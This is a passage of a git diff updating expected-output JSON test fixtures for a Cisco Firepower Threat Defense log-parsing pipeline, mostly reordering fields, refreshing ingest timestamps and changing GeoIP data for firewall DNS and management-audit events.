of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2546,37 +2444,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2585,15 +2477,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2632,7 +2524,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097002100Z", + "ingested": "2021-12-14T14:37:39.593582355Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2695,37 +2587,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2734,15 +2620,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2781,7 +2667,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097006900Z", + "ingested": "2021-12-14T14:37:39.593582687Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -2844,36 +2730,30 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "type": "PTR" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "type": "PTR" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2882,15 +2762,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2929,7 +2809,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097011800Z", + "ingested": "2021-12-14T14:37:39.593583018Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2991,37 +2871,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -3030,15 +2904,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -3077,7 +2951,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097017800Z", + "ingested": "2021-12-14T14:37:39.593583358Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json index 5271161c37c..c08cccdbdfa 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2019-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" @@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.751642700Z", + "ingested": "2021-12-14T14:37:43.824205506Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:33:00.751651600Z", + "ingested": "2021-12-14T14:37:43.824208214Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json index 60dcd209115..c483bae03e3 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -1,1257 +1,1254 @@ { "expected": [ { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:56:30.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917237300Z", + "ingested": "2021-12-14T14:37:43.991231592Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917245300Z", + "ingested": "2021-12-14T14:37:43.991234161Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ChangeReconciliation.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ChangeReconciliation.cgi" + }, "@timestamp": "2019-08-14T13:57:26.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917254100Z", + "ingested": "2021-12-14T14:37:43.991234631Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:34.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917259700Z", + "ingested": "2021-12-14T14:37:43.991235049Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "lights_out_mgmt.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "lights_out_mgmt.cgi" + }, "@timestamp": "2019-08-14T13:57:43.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917265Z", + "ingested": "2021-12-14T14:37:43.991235436Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917270200Z", + "ingested": "2021-12-14T14:37:43.991235827Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917275600Z", + "ingested": "2021-12-14T14:37:43.991236232Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917280800Z", + "ingested": "2021-12-14T14:37:43.991236633Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:41.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917286100Z", + "ingested": "2021-12-14T14:37:43.991237020Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:58:47.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917291400Z", + "ingested": "2021-12-14T14:37:43.991237399Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:52.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917296700Z", + "ingested": "2021-12-14T14:37:43.991237786Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:54.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917302400Z", + "ingested": "2021-12-14T14:37:43.991238396Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:10.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917307900Z", + "ingested": "2021-12-14T14:37:43.991238793Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:15.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917313200Z", + "ingested": "2021-12-14T14:37:43.991239186Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917318400Z", + "ingested": "2021-12-14T14:37:43.991239578Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917323700Z", + "ingested": "2021-12-14T14:37:43.991239980Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917329100Z", + "ingested": "2021-12-14T14:37:43.991240510Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917334500Z", + "ingested": "2021-12-14T14:37:43.991240894Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917339800Z", + "ingested": "2021-12-14T14:37:43.991241275Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:13.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917345100Z", + "ingested": "2021-12-14T14:37:43.991241656Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917350400Z", + "ingested": "2021-12-14T14:37:43.991242046Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917355800Z", + "ingested": "2021-12-14T14:37:43.991242433Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917361100Z", + "ingested": "2021-12-14T14:37:43.991242814Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, 